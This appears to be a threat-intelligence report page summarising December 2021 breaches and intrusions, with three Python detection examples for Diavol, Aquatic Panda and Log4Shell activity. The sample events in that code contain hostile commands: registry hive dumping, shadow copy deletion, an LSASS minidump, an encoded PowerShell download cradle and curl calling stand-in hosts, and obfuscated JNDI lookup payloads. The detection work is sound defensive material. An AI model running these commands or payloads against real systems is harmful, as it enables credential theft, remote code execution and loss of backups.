The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks: these reports help your team look for malicious exploit strings and run exposure checks on your endpoints and servers, which can identify successful payload delivery and compromise through the vulnerability in question.

Intelligence Levels
  • Tactical: detectable threat behaviors, with Threat Scenarios or Threat Identifiers for response
  • Strategic: general information security news, for awareness
About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

We curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our craft are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports Hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles
Want more?

If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at yo@anvilogic.com.

Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.

If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us; we’re happy to help: detection.support@anvilogic.com

Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform

Broward Health Data Breach

December 29, 2021

Industry: Health | Level: Strategic | Source: BleepingComputer

Florida-based Broward Health disclosed a data breach that occurred on October 15, 2021. The breach affected 1,357,879 individuals; the organization identified the incident four days later, the same day the FBI and the US Department of Justice were notified. The intrusion into the hospital’s network exposed patient data, including names, birth dates, physical addresses, phone numbers, financial information, Social Security numbers, email addresses, medical information and history, and more.

Lapsus$ Ransomware Gang Hacks Portugal’s Media Conglomerate, Impresa

December 29, 2021

Industry: Entertainment | Level: Strategic | Source: TheRecord

Over the New Year’s weekend, Impresa, a large media conglomerate in Portugal, was compromised by the Lapsus$ ransomware gang. The attack affected the television channel SIC and the weekly newspaper Expresso. The compromise of the company’s IT infrastructure forced the websites of the affected media outlets offline. The Lapsus$ gang took credit for the attack, defacing Impresa’s sites and leaving a ransom note. The group also claims to have access to the company’s Amazon Web Services account.

Diavol Ransomware – DFIR Report

December 29, 2021

Industry: N/A | Level: Operational | Source: DFIR-Report

Intrusion analysis from The DFIR Report documented a BazarLoader infection that led to the deployment of Diavol ransomware. The threat actor behind Diavol is suspected to be Wizard Spider. The intrusion spanned three days. Initial access came from BazarLoader, delivered through a phishing email containing a malicious OneDrive link. Following the infection, the actors began internal reconnaissance and ran a batch script that harvested credentials from the registry hives. After an 18-hour break in activity, further reconnaissance followed, along with use of the Rubeus tool, lateral movement over RDP and AnyDesk, and data exfiltration with FileZilla. Finally, alongside the ransomware deployment, a batch script was executed to delete volume shadow copies and stop services.

  • Anvilogic Scenarios:
    • Diavol Ransomware
    • BazarLoader Behaviors
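
The three impact-stage behaviours in the Diavol write-up (credential theft from the registry hives, shadow copy deletion, service stops) are each visible in a single process command line, which is what makes them good atomic identifiers; a per-host rollup of several identifiers inside a short window is the shape of a scenario. The following is an added example, not The DFIR Report’s findings or Anvilogic’s detection content: it mirrors the identifier/scenario split described above in plain Python over constructed Windows process-creation events. The command lines are typical forms of each technique, not the scripts from the report, and hostnames, users and timestamps are made up.

```python
"""Threat-identifier style checks for the Diavol impact stage (credential
theft from registry hives, shadow copy deletion, service stops), run over
constructed Windows process-creation events and rolled up per host into a
scenario hit. Added example; not The DFIR Report's or Anvilogic's content.
The command lines are typical forms of each technique, not the report's."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    ts: int              # epoch seconds (constructed)
    host: str
    user: str
    parent_image: str
    command_line: str


# Atomic identifiers: one pattern per behaviour, matched against a
# lower-cased, whitespace-collapsed command line so that casing and padding
# tricks do not fragment a rule into many variants.
IDENTIFIERS = {
    "shadow_copy_deletion": re.compile(
        r"vssadmin(\.exe)? delete shadows"
        r"|wmic(\.exe)? shadowcopy delete"
        r"|win32_shadowcopy"
        r"|vssadmin(\.exe)? resize shadowstorage"),
    "service_stop": re.compile(
        r"(^|\s)net1?(\.exe)? stop \S"
        r"|(^|\s)sc(\.exe)? stop \S"),
    "registry_hive_save": re.compile(
        r"(^|\s)reg(\.exe)? save hklm\\(sam|system|security)(\s|$)"),
}


def normalise(command_line: str) -> str:
    return " ".join(command_line.lower().split())


def match_identifiers(event: ProcessEvent) -> list[str]:
    """Names of every identifier the event trips, sorted for stable output."""
    cmd = normalise(event.command_line)
    return sorted(name for name, rx in IDENTIFIERS.items() if rx.search(cmd))


def scenario_hits(events, window_s: int = 3600, min_distinct: int = 2) -> dict[str, list[str]]:
    """Scenario: a host tripping at least `min_distinct` different identifiers
    within `window_s` seconds. Returns host -> identifiers seen in the window."""
    per_host: dict[str, list[tuple[int, str]]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        for name in match_identifiers(ev):
            per_host[ev.host].append((ev.ts, name))
    hits: dict[str, list[str]] = {}
    for host, seen in per_host.items():
        for i, (t0, _) in enumerate(seen):
            in_window = {n for t, n in seen[i:] if t - t0 <= window_s}
            if len(in_window) >= min_distinct:
                hits[host] = sorted(in_window)
                break
    return hits


# Constructed sample events (not from the report). WS01 shows a hive-dumping
# script, FS02 the pre-encryption batch script, ADM03 an admin stopping one
# service by hand.
SAMPLE_EVENTS = [
    ProcessEvent(1000, "WS01", "CORP\\jdoe", "cmd.exe",
                 r"reg.exe save HKLM\SAM C:\Users\Public\sam.hiv"),
    ProcessEvent(1003, "WS01", "CORP\\jdoe", "cmd.exe",
                 r"reg.exe save HKLM\SYSTEM C:\Users\Public\system.hiv"),
    ProcessEvent(5000, "FS02", "CORP\\svc_backup", "cmd.exe",
                 r'net stop "SQL Server (MSSQLSERVER)" /y'),
    ProcessEvent(5002, "FS02", "CORP\\svc_backup", "cmd.exe",
                 r"VssAdmin.exe  Delete Shadows /All /Quiet"),
    ProcessEvent(5004, "FS02", "CORP\\svc_backup", "cmd.exe",
                 r"wmic shadowcopy delete"),
    ProcessEvent(9000, "ADM03", "CORP\\admin", "powershell.exe",
                 r"sc.exe stop Spooler"),
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.host, match_identifiers(ev))
    print(scenario_hits(SAMPLE_EVENTS))
```

Run as-is, the identifiers fire on every host, but only FS02 reaches scenario level, because it trips two different identifiers within the window; the lone `sc stop Spooler` on ADM03 stays an identifier hit, and the two SAM/SYSTEM saves on WS01 count as one identifier, which is the right place to add a second rule (for example on the output path) if hive dumping alone should escalate in your environment.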

Purple Fox Rootkit

December 29, 2021

Industry: N/A | Level: Tactical | Source: Minerva-Labs

Research from Minerva Labs reports that MalwareHunterTeam identified a malicious Telegram installer compiled in AutoIt, named “Telegram Desktop.exe,” which results in infection with the Purple Fox rootkit. The installer attempts to evade detection by working with small files: the first batch is dropped by the initial “Telegram Desktop.exe” executable, which then copies specific files to the ProgramData folder, launches an executable, and deletes the recently downloaded files. Following registry modifications, additional malicious files are downloaded that run a new driver service, bypass UAC, and stop AV. In the final stages, the information collected about installed AV products is exfiltrated to the C2 server and the Purple Fox rootkit is downloaded.

  • Anvilogic Scenario: Malicious Telegram Installer
  • Anvilogic Use Cases:
    • Executable Create Script Process
    • Driver as Command Parameter
    • Suspicious Registry Key Created
    • Suspicious DLLhost Execution

BlackTech – “Flagpro”

December 29, 2021

Industry: N/A | Level: Operational | Source: NTTSecurity

The threat actor group BlackTech has been observed by NTT Security using a new malware called Flagpro, actively targeting Japanese companies. The malware is used in the initial stages of the attack, delivered through spear-phishing emails with a zip attachment containing a malicious Excel document with a macro. Following macro execution, the Flagpro executable is dropped into the startup directory, where it runs on the next system launch. The malware communicates with its C2 server using base64-encoded traffic, and its functions include downloading additional tools, executing OS commands, and collecting and sending Windows authentication information. If the attacker determines that the compromised host is a suitable target, they proceed to download the second-stage malware.

  • Anvilogic Scenario: BlackTech – FlagPro – Behaviors

ONUS Compromised from Log4Shell

December 29, 2021

Industry: Technology | Level: Tactical | Source: Cystack

CyStack reported the compromise of ONUS, a cryptocurrency platform in Vietnam, whose payment software from Cyclos was vulnerable to CVE-2021-44228 (Log4Shell). Insecure configuration of the company’s AWS S3 buckets escalated the attack. The attackers used Log4Shell payloads to establish a malicious connection and read the file “cyclos.properties,” which contained AWS credentials; this led them to capitalize on ONUS’s misconfiguration of granting the “AmazonS3FullAccess permission to the access key which allowed attackers to compromise and easily delete all of the S3 buckets. Also on these servers, ONUS had a script to periodically back up the database to S3 which contained the database hostname and username/password as well as backup SQL files. As a consequence, the attackers could access the ONUS database to get user information.” They also downloaded a backdoor onto the server, disguised as the Linux kernel’s kworker process, that tunneled a connection to the attackers’ C2 server over SSH. The attack compromised 2 million ONUS users; the leaked information includes eKYC and personal data as well as password hashes.

  • Anvilogic Use Cases:
    • Potential CVE-2021-44228 – Log4Shell
    • AWS S3 Bucket Manipulation
    • SSH Pivoting

Aquatic Panda

December 29, 2021

Industry: Education | Level: Operational | Source: CrowdStrike

CrowdStrike’s OverWatch team identified an attempted Log4Shell exploit by “Aquatic Panda” against an unnamed academic institution. The investigation began with a review of suspicious activity from a Tomcat process running under a vulnerable VMware Horizon instance. The threat actor ran multiple connectivity checks through DNS lookups for a specific subdomain and attempted to execute curl and wget commands to retrieve tools; the use of Linux commands on a Windows host running the Apache Tomcat service was itself peculiar. As the affected institution worked to mitigate the attack, OverWatch researchers continued to track the actor, identifying reconnaissance of system privileges and the download of additional scripts through a Base64-encoded PowerShell command that dropped three files with VBS extensions; once decoded with cscript.exe, these were identified as an EXE, a DLL, and a DAT file. Credential-harvesting attempts were observed in the form of an LSASS memory dump, with WinRAR used to compress the dump for exfiltration. Eventually, the victim organization patched the vulnerable application, which stopped any further activity from Aquatic Panda.

  • Anvilogic Scenario: Aquatic Panda – Behaviors
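
Two of the tells in the Aquatic Panda activity are worth turning into checks: a web server process that should never spawn shell or download tooling doing exactly that, and a Base64-encoded PowerShell command line whose decoded body is a download cradle. The block below is an added example, not CrowdStrike’s or Anvilogic’s content. It decodes `-EncodedCommand` (UTF-16LE inside Base64, accepting the abbreviated switch spellings PowerShell allows), flags the parent/child anomaly, and also catches the LSASS dump that followed. The process-creation events, the Windows Tomcat path, hostnames and URLs are all constructed.

```python
"""Two of the Aquatic Panda tells as detection checks over constructed Windows
process-creation events: a web server process spawning shell or download
tooling, and a Base64-encoded PowerShell command line whose decoded script
is a download cradle, plus the LSASS dump that followed. Added example; not
CrowdStrike's or Anvilogic's content. Paths, hostnames and the Tomcat image
name are assumptions."""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -en,
# -enc, ...) plus the alias -ec, so capture every "-e<letters>" switch that is
# followed by a Base64-looking token and filter in code.
_FLAG_RX = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)
_WEB_SERVER_RX = re.compile(r"^(tomcat\d*|java|javaw|w3wp|httpd)\.exe$", re.I)
_LOLBIN_RX = re.compile(
    r"^(cmd|powershell|pwsh|curl|wget|certutil|bitsadmin|cscript|wscript)\.exe$", re.I)
_CRADLE_RX = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod"
    r"|\birm\b|\bcurl\b|\bwget\b|start-bitstransfer|\biex\b|invoke-expression"
    r"|frombase64string", re.I)
_LSASS_RX = re.compile(r"\blsass\b|comsvcs\.dll.{0,40}minidump", re.I)


def decode_encoded_command(command_line: str) -> str | None:
    """Decoded script if the command line carries -EncodedCommand, else None."""
    for m in _FLAG_RX.finditer(command_line):
        flag = m.group(1).lower()
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue                          # e.g. -ExecutionPolicy
        try:
            return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(ev: ProcessEvent) -> list[str]:
    findings: list[str] = []
    parent, image = _basename(ev.parent_image), _basename(ev.image)
    if _WEB_SERVER_RX.match(parent) and _LOLBIN_RX.match(image):
        findings.append(f"web_server_child:{parent}->{image}")
    script = decode_encoded_command(ev.command_line)
    if script is not None:
        findings.append("encoded_powershell")
    # Inspect the decoded script when there is one, otherwise the raw line.
    if _CRADLE_RX.search(script if script is not None else ev.command_line):
        findings.append("download_cradle")
    if _LSASS_RX.search(ev.command_line):
        findings.append("lsass_dump")
    return findings


# Constructed sample (not from the CrowdStrike report).
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.20/stage.vbs')"
ENC = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
TOMCAT = r"C:\Program Files\Apache Software Foundation\Tomcat 8.5\bin\Tomcat8.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    ProcessEvent("HORIZON01", TOMCAT, CMD, "cmd.exe /c nslookup abc.example.invalid"),
    ProcessEvent("HORIZON01", TOMCAT, CMD,
                 r"cmd.exe /c curl http://203.0.113.20/t.exe -o C:\Windows\Temp\t.exe"),
    ProcessEvent("HORIZON01", CMD, PS,
                 f"powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc {ENC}"),
    ProcessEvent("HORIZON01", CMD, r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 612 C:\Windows\Temp\l.dmp full"),
    ProcessEvent("WS07", r"C:\Windows\explorer.exe", PS,
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.host, ev.image.rsplit("\\", 1)[-1], triage(ev))
```

The parent/child check is the cheapest and most reliable of the three: on a Windows Horizon or Tomcat host there is no legitimate reason for the Java process to spawn cmd.exe, curl or wget, so that pairing alone justifies an investigation regardless of what the command line says. The encoded-command decode matters because string rules on the raw line see only Base64; the cradle pattern only becomes visible after decoding.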

Conti & Log4Shell from AdvIntel

December 21, 2021

Industry: N/A | Level: Tactical | Source: AdvIntel

Continued vigilance on the threat landscape following Log4Shell has identified signs of interest from the Conti ransomware group. A report from AdvIntel detailed that Conti had been deprived of new viable attack vectors since November and had been searching for new methods; it was only with the fallout from Log4Shell that the group found what it had been looking for. Multiple Conti members have been observed scanning for the vulnerability. A recent statement from AdvIntel confirmed, “the criminals pursued targeting specific vulnerable Log4J2 VMware vCenter for lateral movement directly from the compromised network resulting in vCenter access affecting US and European victim networks from the pre-existent Cobalt Strike sessions.”

  • Anvilogic Scenarios:
    • Log4Shell Payload
    • Kinsing Behaviors
    • Unix File Download, Modified, Executed
  • Anvilogic Use Cases:
    • Potential CVE-2021-44228 – Log4Shell
    • File Download (Unix)
    • Modify File Attributes
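
Both the ONUS compromise and Conti’s scanning start the same way: a `${jndi:...}` lookup string reaching a Log4j logging call, usually through an HTTP field the application logs. Scanners rarely send the plain form, because the first wave of signatures matched `${jndi:` literally; they wrap it in the nested-lookup obfuscations Log4j itself resolves (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`) and URL-encode the result. The block below is an added example, not CyStack’s, AdvIntel’s or Anvilogic’s detection content: it undoes those layers the way Log4j would and then looks for the lookup, run over constructed combined-format access log lines. The log format, field names and addresses are assumptions.

```python
"""Find Log4Shell (CVE-2021-44228) lookup strings in HTTP access logs, after
undoing the URL encoding and nested-lookup tricks attackers use to evade a
plain "${jndi:" match. Added example, not CyStack's, AdvIntel's or Anvilogic's
detection content; the log lines below are constructed."""
from __future__ import annotations

import re
from urllib.parse import unquote

# Innermost lookups that evaluate to a literal: ${lower:J} / ${upper:j} change
# case, and any lookup with a ":-default" yields the default when the key is
# empty or unknown, which is what ${::-j} and ${env:NOPE:-j} rely on.
_CASE_RX = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.I)
_DEFAULT_RX = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
_JNDI_RX = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)

# Combined log format: ip ident user [time] "request" status bytes "referer" "ua"
_ACCESS_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')


def normalise(s: str, max_rounds: int = 20) -> str:
    """Resolve nested lookups from the inside out until the string is stable."""
    s = unquote(unquote(s))            # payloads are frequently %-encoded twice
    for _ in range(max_rounds):
        before = s
        s = _CASE_RX.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(), s)
        s = _DEFAULT_RX.sub(lambda m: m.group(1), s)
        if s == before:
            break
    return s


def find_jndi(s: str) -> str | None:
    """JNDI scheme (ldap, rmi, dns, ...) of the first lookup found, else None."""
    m = _JNDI_RX.search(normalise(s))
    return m.group(1).lower() if m else None


def scan_access_log(lines) -> list[tuple[str, str, str]]:
    """(client ip, field, scheme) for each line carrying a lookup in any of the
    attacker-controlled fields a Log4j call might format."""
    hits = []
    for line in lines:
        m = _ACCESS_RX.match(line)
        if not m:
            continue
        for field in ("req", "ref", "ua"):
            scheme = find_jndi(m.group(field))
            if scheme:
                hits.append((m.group("ip"), field, scheme))
                break
    return hits


# Constructed log lines (not from any report): one benign, four obfuscation
# styles in different fields, one benign lookup-like string.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.8 - - [21/Dec/2021:10:00:03 +0000] "GET /?x=%24%7B%24%7Blower:j%7Dndi:rmi://203.0.113.8:1099/b%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.9 - - [21/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.9/c}" "Mozilla/5.0"',
    '203.0.113.10 - - [21/Dec/2021:10:00:05 +0000] "POST /login HTTP/1.1" 200 64 "-" "${${env:NARF:-j}ndi:dns://203.0.113.10/d}"',
    '10.0.0.6 - - [21/Dec/2021:10:00:06 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

Two caveats a practitioner should keep in mind. First, this only sees the fields the web server logs; a payload in a header the application logs but the access log does not (an `X-Api-Version`, for example) never reaches it, so the same normalisation belongs on the application log as well. Second, a hit here proves that a lookup arrived, not that it resolved: confirming exploitation means pairing it with the outbound LDAP/RMI connection or the child process the Java service spawned next, which is what the Unix file download and SSH pivoting use cases above are for.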

McMenamins Suffers Conti Ransomware Attack

December 21, 2021

Industry: Hospitality, Food & Beverage | Level: Strategic | Source: BleepingComputer

A ransomware attack by Conti disrupted operations for the Portland brewery and hotel chain McMenamins. The attack occurred on December 12, 2021, and impacted point-of-sale systems, servers, and workstations, forcing McMenamins to shut down its IT systems. The investigation is ongoing, and it is not yet known whether any customer data was affected.

Sports Gear Sites Data Breach Impacts 1.8 Million People

December 21, 2021

Industry: Retail | Level: Strategic | Source: BleepingComputer

A law firm representing four affiliated online sports gear sites, Tackle Warehouse LLC, Running Warehouse LLC, Tennis Warehouse LLC, and Skate Warehouse LLC, has disclosed a cyberattack that resulted in the theft of payment card information for 1,813,224 customers. The breach was identified on October 15 and confirmed on November 29. Compromised data includes names, financial account numbers, credit/debit card numbers with CVV, and website account passwords. No details on the attack itself have been provided; notices were sent to impacted customers by the company, but no identity protection service was offered.